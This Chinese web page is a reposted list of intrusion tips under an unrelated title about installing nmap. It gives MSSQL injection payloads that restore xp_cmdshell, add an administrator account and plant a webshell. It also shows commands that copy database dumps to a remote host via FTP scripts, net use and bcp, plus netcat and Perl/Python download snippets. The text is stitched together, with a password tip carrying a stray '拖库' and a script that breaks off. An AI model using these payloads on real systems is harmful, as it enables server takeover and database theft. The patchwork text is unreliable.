安装nmap记录

我们可以利用古诗进行密码记忆mssql拖库，例如“床前明月光，疑似地上霜”，取每个字的首字母，可以组成这样的密码：

“cqmygysdss”，“CqMyGySdSs”，“cqmyg,ysdsss”,”CQMYG,ysdss”

组合千变万化，而且可以一个月换一句古诗，又好记又安全

（没技术含量勿喷，在一次安全培训上看到的，觉得很不错分享给大家）

8、SQL server注入恢复xp_cmdshell

（1）查看xp_cmdshell是否被禁用。

?id=1234;and (select count(*) from master.dbo.sysobjects where xtype=”X” and name =’xp_cmdshell’)

（2）若存储过程被删掉，则尝试恢复。

?id=1234;and exec sp_addextendepro xp_cmdshell,’xplog70.dll’

（3）若出现下面的错误，可以尝试如下方法：

无法装载 DLL xpsql70.dll 或该DLL 所引用的某一DLL。原因126 (找不到指定模块)。

首先执行，exec sp_dropextendeproc “xp_cmdshell” ,然后执行sp_addextendeproc “xp_cmdshell”,”xpsql70.dll”

无法装载xpweb70.dll 中找到函数xp_cmdshell 原因127

首先执行 exec sp_dropextendeproc “xp_cmdshell” ，然后执行 exec sp_addextendeproc “xp_cmdshell”,”xpweb70.dll”

9、则利用存储过程，执行添加用户的操作。

?id=1234 ;exec master..xp_cmdshell “net user aaa bbb /add ”– 其中aaa为用户名，bbb为密码。

添加到管理员组：

?id=1234 ;exec master..xp_cmdshell “net localgroup administrators aaa/add ”

10、当然当知道web虚拟路径的时候，可以写入一句话木马来完成对计算机的控制。

?id=1234;exec master..xp_cmdshell “copy c:\windows\system32\cmd.exe c:\inetpub\scripts\cmd.exe”

echo ^ c:\inetpub\wwwroot\cms\test123456.asp

11、站库分离拖库技巧（Mssql SA权限）

exec master.dbo.xp_cmdshell "del c:\bak"

-- backup database 数据库名 to disk = 'c:\bak' --备份整个库

exec master.dbo.xp_cmdshell 'bcp 数据库名.dbo.表名 out c:\bak -c' --备份单个表(文本)

exec master.dbo.xp_cmdshell "echo open IP地址 > c:\ftp.txt"

exec master.dbo.xp_cmdshell "echo ftp账户 >> c:\ftp.txt"

exec master.dbo.xp_cmdshell "echo ftp密码 >> c:\ftp.txt"

exec master.dbo.xp_cmdshell "echo binary >> c:\ftp.txt"

exec master.dbo.xp_cmdshell "echo put c:\bak >> c:\ftp.txt"

exec master.dbo.xp_cmdshell "ftp -s:c:\ftp.txt"

exec master.dbo.xp_cmdshell "del c:\ftp.txt"

exec master.dbo.xp_cmdshell "del c:\bak"

exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'

exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'

12、php的eval函数并不是系统组件函数，因此我们在php.ini中使用disable_functions是无法禁止它的。我们也只有使用插件了！

如果想禁掉eval可以用php的扩展 Suhosin：

安装Suhosin后在php.ini中load进来Suhosin.so，再加上suhosin.executor.disable_eval = on即可！

13、巧用netcat下载文件

在本机执行cat file | nc -l 1234

这个命令会将file的内容输出到本地的1234端口中，然后不论谁连接此端口，file的内容将会发送到连接过来的IP。

目标电脑上的命令：nc host_ip 1234 > file

这条命令将连接攻击者的电脑，接受file内容保存。

14、利用Perl下载文件

#!/usr/bin/perl

use LWP::Simple;

getstore(“”, “file”);

执行脚本文件是这样

root@kali:~# perl test.pl

15、利用Python下载文件#!/usr/bin/python

import urllib2

u = urllib2.urlopen(‘’)

localFile = open(‘local_file’, ‘w’)

localFile.write(u.read())

localFile.close()

执行脚本文件是这样

root@kali:~# python test.py

16、利用Ruby下载文件

#!/usr/bin/ruby

require 'net/http'

（编辑：PHP编程网 - 钦州站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!